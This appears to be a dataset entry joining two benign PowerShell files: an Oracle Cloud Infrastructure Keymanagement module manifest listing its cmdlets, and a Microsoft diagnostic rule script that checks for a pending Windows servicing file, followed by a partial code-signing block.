# # Module manifest for module 'OCI.PSModules.Keymanagement' # # Generated by: Oracle Cloud Infrastructure # # @{ # Script module or binary module file associated with this manifest. RootModule = 'assemblies/OCI.PSModules.Keymanagement.dll' # Version number of this module. ModuleVersion = '83.2.0' # Supported PSEditions CompatiblePSEditions = 'Core' # ID used to uniquely identify this module GUID = '4a9c2614-4d97-430e-b149-edbf0d70bf0b' # Author of this module Author = 'Oracle Cloud Infrastructure' # Company or vendor of this module CompanyName = 'Oracle Corporation' # Copyright statement for this module Copyright = '(c) Oracle Cloud Infrastructure. All rights reserved.' # Description of the functionality provided by this module Description = 'This modules provides Cmdlets for OCI Keymanagement Service' # Minimum version of the PowerShell engine required by this module PowerShellVersion = '6.0' # Name of the PowerShell host required by this module # PowerShellHostName = '' # Minimum version of the PowerShell host required by this module # PowerShellHostVersion = '' # Minimum version of Microsoft .NET Framework required by this module. This prerequisite is valid for the PowerShell Desktop edition only. # DotNetFrameworkVersion = '' # Minimum version of the common language runtime (CLR) required by this module. This prerequisite is valid for the PowerShell Desktop edition only. # ClrVersion = '' # Processor architecture (None, X86, Amd64) required by this module # ProcessorArchitecture = '' # Modules that must be imported into the global environment prior to importing this module RequiredModules = @(@{ModuleName = 'OCI.PSModules.Common'; GUID = 'b3061a0d-375b-4099-ae76-f92fb3cdcdae'; RequiredVersion = '83.2.0'; }) # Assemblies that must be loaded prior to importing this module RequiredAssemblies = 'assemblies/OCI.DotNetSDK.Keymanagement.dll' # Script files (.ps1) that are run in the caller's environment prior to importing this module. # ScriptsToProcess = @() # Type files (.ps1xml) to be loaded when importing this module # TypesToProcess = @() # Format files (.ps1xml) to be loaded when importing this module # FormatsToProcess = @() # Modules to import as nested modules of the module specified in RootModule/ModuleToProcess # NestedModules = @() # Functions to export from this module, for best performance, do not use wildcards and do not delete the entry, use an empty array if there are no functions to export. FunctionsToExport = '*' # Cmdlets to export from this module, for best performance, do not use wildcards and do not delete the entry, use an empty array if there are no cmdlets to export. CmdletsToExport = 'Backup-OCIKeymanagementKey', 'Backup-OCIKeymanagementVault', 'Disable-OCIKeymanagementKey', 'Enable-OCIKeymanagementKey', 'Export-OCIKeymanagementKey', 'Get-OCIKeymanagementEkmsPrivateEndpoint', 'Get-OCIKeymanagementEkmsPrivateEndpointsList', 'Get-OCIKeymanagementHsmCluster', 'Get-OCIKeymanagementHsmClustersList', 'Get-OCIKeymanagementHsmPartition', 'Get-OCIKeymanagementHsmPartitionsList', 'Get-OCIKeymanagementKey', 'Get-OCIKeymanagementKeysList', 'Get-OCIKeymanagementKeyVersion', 'Get-OCIKeymanagementKeyVersionsList', 'Get-OCIKeymanagementPreCoUserCredentials', 'Get-OCIKeymanagementReplicationStatus', 'Get-OCIKeymanagementVault', 'Get-OCIKeymanagementVaultReplicasList', 'Get-OCIKeymanagementVaultsList', 'Get-OCIKeymanagementVaultUsage', 'Get-OCIKeymanagementWrappingKey', 'Import-OCIKeymanagementKey', 'Import-OCIKeymanagementKeyVersion', 'Invoke-OCIKeymanagementDecrypt', 'Invoke-OCIKeymanagementDownloadCertificateSigningRequest', 'Invoke-OCIKeymanagementEncrypt', 'Invoke-OCIKeymanagementScheduleHsmClusterDeletion', 'Invoke-OCIKeymanagementScheduleKeyDeletion', 'Invoke-OCIKeymanagementScheduleKeyVersionDeletion', 'Invoke-OCIKeymanagementScheduleVaultDeletion', 'Invoke-OCIKeymanagementSign', 'Invoke-OCIKeymanagementVerify', 'Move-OCIKeymanagementHsmClusterCompartment', 'Move-OCIKeymanagementKeyCompartment', 'Move-OCIKeymanagementVaultCompartment', 'New-OCIKeymanagementDataEncryptionKey', 'New-OCIKeymanagementEkmsPrivateEndpoint', 'New-OCIKeymanagementHsmCluster', 'New-OCIKeymanagementKey', 'New-OCIKeymanagementKeyVersion', 'New-OCIKeymanagementVault', 'New-OCIKeymanagementVaultReplica', 'Remove-OCIKeymanagementEkmsPrivateEndpoint', 'Remove-OCIKeymanagementVaultReplica', 'Restore-OCIKeymanagementKeyFromFile', 'Restore-OCIKeymanagementKeyFromObjectStore', 'Restore-OCIKeymanagementVaultFromFile', 'Restore-OCIKeymanagementVaultFromObjectStore', 'Stop-OCIKeymanagementHsmClusterDeletion', 'Stop-OCIKeymanagementKeyDeletion', 'Stop-OCIKeymanagementKeyVersionDeletion', 'Stop-OCIKeymanagementVaultDeletion', 'Update-OCIKeymanagementEkmsPrivateEndpoint', 'Update-OCIKeymanagementHsmCluster', 'Update-OCIKeymanagementKey', 'Update-OCIKeymanagementVault', 'Write-OCIKeymanagementPartitionCertificates' # Variables to export from this module VariablesToExport = '*' # Aliases to export from this module, for best performance, do not use wildcards and do not delete the entry, use an empty array if there are no aliases to export. AliasesToExport = '*' # DSC resources to export from this module # DscResourcesToExport = @() # List of all modules packaged with this module # ModuleList = @() # List of all files packaged with this module # FileList = @() # Private data to pass to the module specified in RootModule/ModuleToProcess. This may also contain a PSData hashtable with additional module metadata used by PowerShell. PrivateData = @{ PSData = @{ # Tags applied to this module. These help with module discovery in online galleries. Tags = 'PSEdition_Core','Windows','Linux','macOS','Oracle','OCI','Cloud','OracleCloudInfrastructure','Keymanagement' # A URL to the license for this module. LicenseUri = 'https://github.com/oracle/oci-powershell-modules/blob/master/LICENSE.txt' # A URL to the main website for this project. ProjectUri = 'https://github.com/oracle/oci-powershell-modules/' # A URL to an icon representing this module. IconUri = 'https://github.com/oracle/oci-powershell-modules/blob/master/icon.png' # ReleaseNotes of this module ReleaseNotes = 'https://github.com/oracle/oci-powershell-modules/blob/master/CHANGELOG.md' # Prerelease string of this module # Prerelease = '' # Flag to indicate whether the module requires explicit user acceptance for install/update/save # RequireLicenseAcceptance = $false # External dependent modules of this module # ExternalModuleDependencies = @() } # End of PSData hashtable } # End of PrivateData hashtable # HelpInfo URI of this module # HelpInfoURI = '' # Default prefix for commands exported from this module. Override the default prefix using Import-Module -Prefix. # DefaultCommandPrefix = '' }
combined_dataset/train/non-malicious/sample_15_37.ps1
sample_15_37.ps1
#************************************************ # TS_ServicingPendingXml.ps1 # Version 1.0.1 # Date: 6/6/2012 # Author: v-alyao # Description: [Idea ID 3472] [Windows] Pending Transactions Rule Idea - Pending.xml # Rule number: 3472 # Rule URL: http://sharepoint/sites/rules/Rule Submissions/Forms/DispForm.aspx?ID=3472 #************************************************ Import-LocalizedData -BindingVariable ScriptStrings Display-DefaultActivity -Rule -RuleNumber 3472 $RuleApplicable = $false $RootCauseDetected = $false $RootCauseName = "RC_ServicingPendingXml" $PublicContent = "http://support.microsoft.com/kb/2509997" $InternalContent = "" $Verbosity = "Warning" $Visibility = "4" $SupportTopicsID = "8110" $Title = $ScriptStrings.ID_ServicingPendingXml_ST $InformationCollected = new-object PSObject # *************************** # Data Gathering # *************************** Function AppliesToSystem { #Add your logic here to specify on which environments this rule will appy return ((($OSVersion.Major -eq 6) -and ($OSVersion.Minor -eq 0)) -or #Win Vista/Server 2008 (($OSVersion.Major -eq 6) -and ($OSVersion.Minor -eq 1)) -or #Win 7/Server 2008 R2 (($OSVersion.Major -eq 6) -and ($OSVersion.Minor -eq 2)) -or ($OSVersion.Major -eq 10)) } # ************** # Detection Logic # ************** $PendingXmlPath=Join-path -Path $Env:windir "Winsxs\pending.xml" Function CheckPendingXML() { return Test-Path -Path $PendingXmlPath } #Check to see if rule is applicable to this computer if (AppliesToSystem) { $RuleApplicable = $true if (CheckPendingXML) { $RootCauseDetected = $true #Add information to InformationCollected $InformationCollected | add-member -membertype noteproperty -name "File Name" -value $PendingXmlPath } } # ********************* # Root Cause processing # ********************* if ($RuleApplicable) { if ($RootCauseDetected) { # Red/ Yellow Light Update-DiagRootCause -id $RootCauseName -Detected $true Write-GenericMessage -RootCauseId $RootCauseName -PublicContentURL $PublicContent -InformationCollected $InformationCollected -Verbosity $Verbosity -Visibility $Visibility -SupportTopicsID $SupportTopicsID -InternalContentURL $InternalContent -SolutionTitle $Title } else { # Green Light Update-DiagRootCause -id $RootCauseName -Detected $false } } # SIG # Begin signature block # MIIoUgYJKoZIhvcNAQcCoIIoQzCCKD8CAQExDzANBglghkgBZQMEAgEFADB5Bgor # BgEEAYI3AgEEoGswaTA0BgorBgEEAYI3AgEeMCYCAwEAAAQQH8w7YFlLCE63JNLG # KX7zUQIBAAIBAAIBAAIBAAIBADAxMA0GCWCGSAFlAwQCAQUABCAsJdYR32egKkO6 # zjFgeGxD5y3Z1Rkd8E5qdd1d1aFDqKCCDYUwggYDMIID66ADAgECAhMzAAAEA73V # lV0POxitAAAAAAQDMA0GCSqGSIb3DQEBCwUAMH4xCzAJBgNVBAYTAlVTMRMwEQYD # VQQIEwpXYXNoaW5ndG9uMRAwDgYDVQQHEwdSZWRtb25kMR4wHAYDVQQKExVNaWNy # b3NvZnQgQ29ycG9yYXRpb24xKDAmBgNVBAMTH01pY3Jvc29mdCBDb2RlIFNpZ25p # bmcgUENBIDIwMTEwHhcNMjQwOTEyMjAxMTEzWhcNMjUwOTExMjAxMTEzWjB0MQsw # CQYDVQQGEwJVUzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMHUmVkbW9u # ZDEeMBwGA1UEChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMR4wHAYDVQQDExVNaWNy # b3NvZnQgQ29ycG9yYXRpb24wggEiMA0GCSqGSIb3DQEBAQUAA4IBDwAwggEKAoIB # AQCfdGddwIOnbRYUyg03O3iz19XXZPmuhEmW/5uyEN+8mgxl+HJGeLGBR8YButGV # LVK38RxcVcPYyFGQXcKcxgih4w4y4zJi3GvawLYHlsNExQwz+v0jgY/aejBS2EJY # oUhLVE+UzRihV8ooxoftsmKLb2xb7BoFS6UAo3Zz4afnOdqI7FGoi7g4vx/0MIdi # kwTn5N56TdIv3mwfkZCFmrsKpN0zR8HD8WYsvH3xKkG7u/xdqmhPPqMmnI2jOFw/ # /n2aL8W7i1Pasja8PnRXH/QaVH0M1nanL+LI9TsMb/enWfXOW65Gne5cqMN9Uofv # ENtdwwEmJ3bZrcI9u4LZAkujAgMBAAGjggGCMIIBfjAfBgNVHSUEGDAWBgorBgEE # AYI3TAgBBggrBgEFBQcDAzAdBgNVHQ4EFgQU6m4qAkpz4641iK2irF8eWsSBcBkw # VAYDVR0RBE0wS6RJMEcxLTArBgNVBAsTJE1pY3Jvc29mdCBJcmVsYW5kIE9wZXJh # dGlvbnMgTGltaXRlZDEWMBQGA1UEBRMNMjMwMDEyKzUwMjkyNjAfBgNVHSMEGDAW # gBRIbmTlUAXTgqoXNzcitW2oynUClTBUBgNVHR8ETTBLMEmgR6BFhkNodHRwOi8v # d3d3Lm1pY3Jvc29mdC5jb20vcGtpb3BzL2NybC9NaWNDb2RTaWdQQ0EyMDExXzIw # MTEtMDctMDguY3JsMGEGCCsGAQUFBwEBBFUwUzBRBggrBgEFBQcwAoZFaHR0cDov # L3d3dy5taWNyb3NvZnQuY29tL3BraW9wcy9jZXJ0cy9NaWNDb2RTaWdQQ0EyMDEx # XzIwMTEtMDctMDguY3J0MAwGA1UdEwEB/wQCMAAwDQYJKoZIhvcNAQELBQADggIB # AFFo/6E4LX51IqFuoKvUsi80QytGI5ASQ9zsPpBa0z78hutiJd6w154JkcIx/f7r # EBK4NhD4DIFNfRiVdI7EacEs7OAS6QHF7Nt+eFRNOTtgHb9PExRy4EI/jnMwzQJV # NokTxu2WgHr/fBsWs6G9AcIgvHjWNN3qRSrhsgEdqHc0bRDUf8UILAdEZOMBvKLC # rmf+kJPEvPldgK7hFO/L9kmcVe67BnKejDKO73Sa56AJOhM7CkeATrJFxO9GLXos # oKvrwBvynxAg18W+pagTAkJefzneuWSmniTurPCUE2JnvW7DalvONDOtG01sIVAB # +ahO2wcUPa2Zm9AiDVBWTMz9XUoKMcvngi2oqbsDLhbK+pYrRUgRpNt0y1sxZsXO # raGRF8lM2cWvtEkV5UL+TQM1ppv5unDHkW8JS+QnfPbB8dZVRyRmMQ4aY/tx5x5+ # sX6semJ//FbiclSMxSI+zINu1jYerdUwuCi+P6p7SmQmClhDM+6Q+btE2FtpsU0W # +r6RdYFf/P+nK6j2otl9Nvr3tWLu+WXmz8MGM+18ynJ+lYbSmFWcAj7SYziAfT0s # IwlQRFkyC71tsIZUhBHtxPliGUu362lIO0Lpe0DOrg8lspnEWOkHnCT5JEnWCbzu # iVt8RX1IV07uIveNZuOBWLVCzWJjEGa+HhaEtavjy6i7MIIHejCCBWKgAwIBAgIK # YQ6Q0gAAAAAAAzANBgkqhkiG9w0BAQsFADCBiDELMAkGA1UEBhMCVVMxEzARBgNV # BAgTCldhc2hpbmd0b24xEDAOBgNVBAcTB1JlZG1vbmQxHjAcBgNVBAoTFU1pY3Jv # c29mdCBDb3Jwb3JhdGlvbjEyMDAGA1UEAxMpTWljcm9zb2Z0IFJvb3QgQ2VydGlm # aWNhdGUgQXV0aG9yaXR5IDIwMTEwHhcNMTEwNzA4MjA1OTA5WhcNMjYwNzA4MjEw # OTA5WjB+MQswCQYDVQQGEwJVUzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UE # BxMHUmVkbW9uZDEeMBwGA1UEChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMSgwJgYD # VQQDEx9NaWNyb3NvZnQgQ29kZSBTaWduaW5nIFBDQSAyMDExMIICIjANBgkqhkiG # 9w0BAQEFAAOCAg8AMIICCgKCAgEAq/D6chAcLq3YbqqCEE00uvK2WCGfQhsqa+la # UKq4BjgaBEm6f8MMHt03a8YS2AvwOMKZBrDIOdUBFDFC04kNeWSHfpRgJGyvnkmc # 6Whe0t+bU7IKLMOv2akrrnoJr9eWWcpgGgXpZnboMlImEi/nqwhQz7NEt13YxC4D # dato88tt8zpcoRb0RrrgOGSsbmQ1eKagYw8t00CT+OPeBw3VXHmlSSnnDb6gE3e+ # lD3v++MrWhAfTVYoonpy4BI6t0le2O3tQ5GD2Xuye4Yb2T6xjF3oiU+EGvKhL1nk # kDstrjNYxbc+/jLTswM9sbKvkjh+0p2ALPVOVpEhNSXDOW5kf1O6nA+tGSOEy/S6 # A4aN91/w0FK/jJSHvMAhdCVfGCi2zCcoOCWYOUo2z3yxkq4cI6epZuxhH2rhKEmd # X4jiJV3TIUs+UsS1Vz8kA/DRelsv1SPjcF0PUUZ3s/gA4bysAoJf28AVs70b1FVL # 5zmhD+kjSbwYuER8ReTBw3J64HLnJN+/RpnF78IcV9uDjexNSTCnq47f7Fufr/zd # sGbiwZeBe+3W7UvnSSmnEyimp31ngOaKYnhfsi+E11ecXL93KCjx7W3DKI8sj0A3 # T8HhhUSJxAlMxdSlQy90lfdu+HggWCwTXWCVmj5PM4TasIgX3p5O9JawvEagbJjS # 4NaIjAsCAwEAAaOCAe0wggHpMBAGCSsGAQQBgjcVAQQDAgEAMB0GA1UdDgQWBBRI # bmTlUAXTgqoXNzcitW2oynUClTAZBgkrBgEEAYI3FAIEDB4KAFMAdQBiAEMAQTAL # BgNVHQ8EBAMCAYYwDwYDVR0TAQH/BAUwAwEB/zAfBgNVHSMEGDAWgBRyLToCMZBD # uRQFTuHqp8cx0SOJNDBaBgNVHR8EUzBRME+gTaBLhklodHRwOi8vY3JsLm1pY3Jv # c29mdC5jb20vcGtpL2NybC9wcm9kdWN0cy9NaWNSb29DZXJBdXQyMDExXzIwMTFf # MDNfMjIuY3JsMF4GCCsGAQUFBwEBBFIwUDBOBggrBgEFBQcwAoZCaHR0cDovL3d3 # dy5taWNyb3NvZnQuY29tL3BraS9jZXJ0cy9NaWNSb29DZXJBdXQyMDExXzIwMTFf # MDNfMjIuY3J0MIGfBgNVHSAEgZcwgZQwgZEGCSsGAQQBgjcuAzCBgzA/BggrBgEF # BQcCARYzaHR0cDovL3d3dy5taWNyb3NvZnQuY29tL3BraW9wcy9kb2NzL3ByaW1h # cnljcHMuaHRtMEAGCCsGAQUFBwICMDQeMiAdAEwAZQBnAGEAbABfAHAAbwBsAGkA # YwB5AF8AcwB0AGEAdABlAG0AZQBuAHQALiAdMA0GCSqGSIb3DQEBCwUAA4ICAQBn # 8oalmOBUeRou09h0ZyKbC5YR4WOSmUKWfdJ5DJDBZV8uLD74w3LRbYP+vj/oCso7 # v0epo/Np22O/IjWll11lhJB9i0ZQVdgMknzSGksc8zxCi1LQsP1r4z4HLimb5j0b # pdS1HXeUOeLpZMlEPXh6I/MTfaaQdION9MsmAkYqwooQu6SpBQyb7Wj6aC6VoCo/ # KmtYSWMfCWluWpiW5IP0wI/zRive/DvQvTXvbiWu5a8n7dDd8w6vmSiXmE0OPQvy # CInWH8MyGOLwxS3OW560STkKxgrCxq2u5bLZ2xWIUUVYODJxJxp/sfQn+N4sOiBp # mLJZiWhub6e3dMNABQamASooPoI/E01mC8CzTfXhj38cbxV9Rad25UAqZaPDXVJi # hsMdYzaXht/a8/jyFqGaJ+HNpZfQ7l1jQeNbB5yHPgZ3BtEGsXUfFL5hYbXw3MYb # BL7fQccOKO7eZS/sl/ahXJbYANahRr1Z85elCUtIEJmAH9AAKcWxm6U/RXceNcbS # oqKfenoi+kiVH6v7RyOA9Z74v2u3S5fi63V4GuzqN5l5GEv/1rMjaHXmr/r8i+sL # gOppO6/8MO0ETI7f33VtY5E90Z1WTk+/gFcioXgRMiF670EKsT/7qMykXcGhiJtX # cVZOSEXAQsmbdlsKgEhr/Xmfwb1tbWrJUnMTDXpQzTGCGiMwghofAgEBMIGVMH4x # CzAJBgNVBAYTAlVTMRMwEQYDVQQIEwpXYXNoaW5ndG9uMRAwDgYDVQQHEwdSZWRt # b25kMR4wHAYDVQQKExVNaWNyb3NvZnQgQ29ycG9yYXRpb24xKDAmBgNVBAMTH01p # Y3Jvc29mdCBDb2RlIFNpZ25pbmcgUENBIDIwMTECEzMAAAQDvdWVXQ87GK0AAAAA # BAMwDQYJYIZIAWUDBAIBBQCgga4wGQYJKoZIhvcNAQkDMQwGCisGAQQBgjcCAQQw # HAYKKwYBBAGCNwIBCzEOMAwGCisGAQQBgjcCARUwLwYJKoZIhvcNAQkEMSIEIKbn # C3+davS0rJXYqlZhhB8ACqDcGgbUidTiSC3FVWQMMEIGCisGAQQBgjcCAQwxNDAy # oBSAEgBNAGkAYwByAG8AcwBvAGYAdKEagBhodHRwOi8vd3d3Lm1pY3Jvc29mdC5j # b20wDQYJKoZIhvcNAQEBBQAEggEARQeSLlNuftgZMvdKFDX+sRt9ZTjnQzkBbMIw # FWU2VxWQ4eVTDOGfYI/W8wxxYoglwhfRFy7tis1eSoOYwWhiQ8Wp/urjem7szaW9 # rMtMqizG9hsfcSSNoPhCp74CaOgj/FaCDTrbJZDUHLae6il7s2OMEmnfNp+4ue7m # kkgZyTmBIDz4F1yFsOP/5ajAfAHmETsQXZujkvchOFCxgrMbyPUO8NaAUe/+2kHf # KXPgQihVXb1a2nSDVlUQvhaclVtuePabJlrKSnQwNCV9wixhIZrQDeISJrCxOWA7 # bZbE6UilgdznMfWQDwASVx46aFg9pg3xH/IFJTrKi9v0StuelaGCF60wghepBgor # BgEEAYI3AwMBMYIXmTCCF5UGCSqGSIb3DQEHAqCCF4YwgheCAgEDMQ8wDQYJYIZI # AWUDBAIBBQAwggFaBgsqhkiG9w0BCRABBKCCAUkEggFFMIIBQQIBAQYKKwYBBAGE # WQoDATAxMA0GCWCGSAFlAwQCAQUABCBbQMp8NjLT96eyDOX2ZaDdIuWq7MjLRCa/ # 6+rr5uL9ewIGZusiCs5vGBMyMDI0MTAyODExNDAzOS41MzlaMASAAgH0oIHZpIHW # MIHTMQswCQYDVQQGEwJVUzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMH # UmVkbW9uZDEeMBwGA1UEChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMS0wKwYDVQQL # EyRNaWNyb3NvZnQgSXJlbGFuZCBPcGVyYXRpb25zIExpbWl0ZWQxJzAlBgNVBAsT # Hm5TaGllbGQgVFNTIEVTTjozNjA1LTA1RTAtRDk0NzElMCMGA1UEAxMcTWljcm9z # b2Z0IFRpbWUtU3RhbXAgU2VydmljZaCCEfswggcoMIIFEKADAgECAhMzAAAB91gg # dQTK+8L0AAEAAAH3MA0GCSqGSIb3DQEBCwUAMHwxCzAJBgNVBAYTAlVTMRMwEQYD # VQQIEwpXYXNoaW5ndG9uMRAwDgYDVQQHEwdSZWRtb25kMR4wHAYDVQQKExVNaWNy # b3NvZnQgQ29ycG9yYXRpb24xJjAkBgNVBAMTHU1pY3Jvc29mdCBUaW1lLVN0YW1w # IFBDQSAyMDEwMB4XDTI0MDcyNTE4MzEwNloXDTI1MTAyMjE4MzEwNlowgdMxCzAJ # BgNVBAYTAlVTMRMwEQYDVQQIEwpXYXNoaW5ndG9uMRAwDgYDVQQHEwdSZWRtb25k # MR4wHAYDVQQKExVNaWNyb3NvZnQgQ29ycG9yYXRpb24xLTArBgNVBAsTJE1pY3Jv # c29mdCBJcmVsYW5kIE9wZXJhdGlvbnMgTGltaXRlZDEnMCUGA1UECxMeblNoaWVs # ZCBUU1MgRVNOOjM2MDUtMDVFMC1EOTQ3MSUwIwYDVQQDExxNaWNyb3NvZnQgVGlt # ZS1TdGFtcCBTZXJ2aWNlMIICIjANBgkqhkiG9w0BAQEFAAOCAg8AMIICCgKCAgEA # 0OdHTBNom6/uXKaEKP9rPITkT6QxF11tjzB0Nk1byDpPrFTHha3hxwSdTcr8Y0a3 # k6EQlwqy6ROz42e0R5eDW+dCoQapipDIFUOYp3oNuqwX/xepATEkY17MyXFx6rQW # 2NcWUJW3Qo2AuJ0HOtblSpItQZPGmHnGqkt/DB45Fwxk6VoSvxNcQKhKETkuzrt8 # U6DRccQm1FdhmPKgDzgcfDPM5o+GnzbiMu6y069A4EHmLMmkecSkVvBmcZ8VnzFH # TDkGLdpnDV5FXjVObAgbSM0cnqYSGfRp7VGHBRqyoscvR4bcQ+CV9pDjbJ6S5rZn # 1uA8hRhj09Hs33HRevt4oWAVYGItgEsG+BrCYbpgWMDEIVnAgPZEiPAaI8wBGemE # 4feEkuz7TAwgkRBcUzLgQ4uvPqRD1A+Jkt26+pDqWYSn0MA8j0zacQk9q/AvciPX # D9It2ez+mqEzgFRRsJGLtcf9HksvK8Jsd6I5zFShlqi5bpzf1Y4NOiNOh5QwW1pI # vA5irlal7qFhkAeeeZqmop8+uNxZXxFCQG3R3s5pXW89FiCh9rmXrVqOCwgcXFIJ # QAQkllKsI+UJqGq9rmRABJz5lHKTFYmFwcM52KWWjNx3z6odwz2h+sxaxewToe9G # qtDx3/aU+yqNRcB8w0tSXUf+ylN4uk5xHEpLpx+ZNNsCAwEAAaOCAUkwggFFMB0G # A1UdDgQWBBTfRqQzP3m9PZWuLf1p8/meFfkmmDAfBgNVHSMEGDAWgBSfpxVdAF5i # XYP05dJlpxtTNRnpcjBfBgNVHR8EWDBWMFSgUqBQhk5odHRwOi8vd3d3Lm1pY3Jv # c29mdC5jb20vcGtpb3BzL2NybC9NaWNyb3NvZnQlMjBUaW1lLVN0YW1wJTIwUENB # JTIwMjAxMCgxKS5jcmwwbAYIKwYBBQUHAQEEYDBeMFwGCCsGAQUFBzAChlBodHRw # Oi8vd3d3Lm1pY3Jvc29mdC5jb20vcGtpb3BzL2NlcnRzL01pY3Jvc29mdCUyMFRp # bWUtU3RhbXAlMjBQQ0ElMjAyMDEwKDEpLmNydDAMBgNVHRMBAf8EAjAAMBYGA1Ud # JQEB/wQMMAoGCCsGAQUFBwMIMA4GA1UdDwEB/wQEAwIHgDANBgkqhkiG9w0BAQsF # AAOCAgEAN0ajafILeL6SQIMIMAXM1Qd6xaoci2mOrpR8vKWyyTsL3b83A7XGLiAb # QxTrqnXvVWWeNst5YQD8saO+UTgOLJdTdfUADhLXoK+RlwjfndimIJT9MH9tUYXL # zJXKhZM09ouPwNsrn8YOLIpdAi5TPyN8Cl11OGZSlP9r8JnvomW00AoJ4Pl9rlg0 # G5lcQknAXqHa9nQdWp1ZxXqNd+0JsKmlR8tcANX33ClM9NnaClJExLQHiKeHUUWt # qyLMl65TW6wRM7XlF7Y+PTnC8duNWn4uLng+ON/Z39GO6qBj7IEZxoq4o3avEh9b # a43UU6TgzVZaBm8VaA0wSwUe/pqpTOYFWN62XL3gl/JC2pzfIPxP66XfRLIxafjB # VXm8KVDn2cML9IvRK02s941Y5+RR4gSAOhLiQQ6A03VNRup+spMa0k+XTPAi+2aM # H5xa1Zjb/K8u9f9M05U0/bUMJXJDP++ysWpJbVRDiHG7szaca+r3HiUPjQJyQl2N # iOcYTGV/DcLrLCBK2zG503FGb04N5Kf10XgAwFaXlod5B9eKh95PnXKx2LNBgLwG # 85anlhhGxxBQ5mFsJGkBn0PZPtAzZyfr96qxzpp2pH9DJJcjKCDrMmZziXazpa5V # VN36CO1kDU4ABkSYTXOM8RmJXuQm7mUF3bWmj+hjAJb4pz6hT5UwggdxMIIFWaAD # AgECAhMzAAAAFcXna54Cm0mZAAAAAAAVMA0GCSqGSIb3DQEBCwUAMIGIMQswCQYD # VQQGEwJVUzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMHUmVkbW9uZDEe # MBwGA1UEChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMTIwMAYDVQQDEylNaWNyb3Nv # ZnQgUm9vdCBDZXJ0aWZpY2F0ZSBBdXRob3JpdHkgMjAxMDAeFw0yMTA5MzAxODIy # MjVaFw0zMDA5MzAxODMyMjVaMHwxCzAJBgNVBAYTAlVTMRMwEQYDVQQIEwpXYXNo # aW5ndG9uMRAwDgYDVQQHEwdSZWRtb25kMR4wHAYDVQQKExVNaWNyb3NvZnQgQ29y # cG9yYXRpb24xJjAkBgNVBAMTHU1pY3Jvc29mdCBUaW1lLVN0YW1wIFBDQSAyMDEw # MIICIjANBgkqhkiG9w0BAQEFAAOCAg8AMIICCgKCAgEA5OGmTOe0ciELeaLL1yR5 # vQ7VgtP97pwHB9KpbE51yMo1V/YBf2xK4OK9uT4XYDP/XE/HZveVU3Fa4n5KWv64 # NmeFRiMMtY0Tz3cywBAY6GB9alKDRLemjkZrBxTzxXb1hlDcwUTIcVxRMTegCjhu # je3XD9gmU3w5YQJ6xKr9cmmvHaus9ja+NSZk2pg7uhp7M62AW36MEBydUv626GIl # 3GoPz130/o5Tz9bshVZN7928jaTjkY+yOSxRnOlwaQ3KNi1wjjHINSi947SHJMPg # yY9+tVSP3PoFVZhtaDuaRr3tpK56KTesy+uDRedGbsoy1cCGMFxPLOJiss254o2I # 5JasAUq7vnGpF1tnYN74kpEeHT39IM9zfUGaRnXNxF803RKJ1v2lIH1+/NmeRd+2 # ci/bfV+AutuqfjbsNkz2K26oElHovwUDo9Fzpk03dJQcNIIP8BDyt0cY7afomXw/ # TNuvXsLz1dhzPUNOwTM5TI4CvEJoLhDqhFFG4tG9ahhaYQFzymeiXtcodgLiMxhy # 16cg8ML6EgrXY28MyTZki1ugpoMhXV8wdJGUlNi5UPkLiWHzNgY1GIRH29wb0f2y # 1BzFa/ZcUlFdEtsluq9QBXpsxREdcu+N+VLEhReTwDwV2xo3xwgVGD94q0W29R6H # XtqPnhZyacaue7e3PmriLq0CAwEAAaOCAd0wggHZMBIGCSsGAQQBgjcVAQQFAgMB # AAEwIwYJKwYBBAGCNxUCBBYEFCqnUv5kxJq+gpE8RjUpzxD/LwTuMB0GA1UdDgQW # BBSfpxVdAF5iXYP05dJlpxtTNRnpcjBcBgNVHSAEVTBTMFEGDCsGAQQBgjdMg30B # ATBBMD8GCCsGAQUFBwIBFjNodHRwOi8vd3d3Lm1pY3Jvc29mdC5jb20vcGtpb3Bz # L0RvY3MvUmVwb3NpdG9yeS5odG0wEwYDVR0lBAwwCgYIKwYBBQUHAwgwGQYJKwYB # BAGCNxQCBAweCgBTAHUAYgBDAEEwCwYDVR0PBAQDAgGGMA8GA1UdEwEB/wQFMAMB # Af8wHwYDVR0jBBgwFoAU1fZWy4/oolxiaNE9lJBb186aGMQwVgYDVR0fBE8wTTBL # oEmgR4ZFaHR0cDovL2NybC5taWNyb3NvZnQuY29tL3BraS9jcmwvcHJvZHVjdHMv # TWljUm9vQ2VyQXV0XzIwMTAtMDYtMjMuY3JsMFoGCCsGAQUFBwEBBE4wTDBKBggr # BgEFBQcwAoY+aHR0cDovL3d3dy5taWNyb3NvZnQuY29tL3BraS9jZXJ0cy9NaWNS # b29DZXJBdXRfMjAxMC0wNi0yMy5jcnQwDQYJKoZIhvcNAQELBQADggIBAJ1Vffwq # reEsH2cBMSRb4Z5yS/ypb+pcFLY+TkdkeLEGk5c9MTO1OdfCcTY/2mRsfNB1OW27 # DzHkwo/7bNGhlBgi7ulmZzpTTd2YurYeeNg2LpypglYAA7AFvonoaeC6Ce5732pv # vinLbtg/SHUB2RjebYIM9W0jVOR4U3UkV7ndn/OOPcbzaN9l9qRWqveVtihVJ9Ak # vUCgvxm2EhIRXT0n4ECWOKz3+SmJw7wXsFSFQrP8DJ6LGYnn8AtqgcKBGUIZUnWK # NsIdw2FzLixre24/LAl4FOmRsqlb30mjdAy87JGA0j3mSj5mO0+7hvoyGtmW9I/2 # kQH2zsZ0/fZMcm8Qq3UwxTSwethQ/gpY3UA8x1RtnWN0SCyxTkctwRQEcb9k+SS+ # c23Kjgm9swFXSVRk2XPXfx5bRAGOWhmRaw2fpCjcZxkoJLo4S5pu+yFUa2pFEUep # 8beuyOiJXk+d0tBMdrVXVAmxaQFEfnyhYWxz/gq77EFmPWn9y8FBSX5+k77L+Dvk # txW/tM4+pTFRhLy/AsGConsXHRWJjXD+57XQKBqJC4822rpM+Zv/Cuk0+CQ1Zyvg # DbjmjJnW4SLq8CdCPSWU5nR0W2rRnj7tfqAxM328y+l7vzhwRNGQ8cirOoo6CGJ/ # 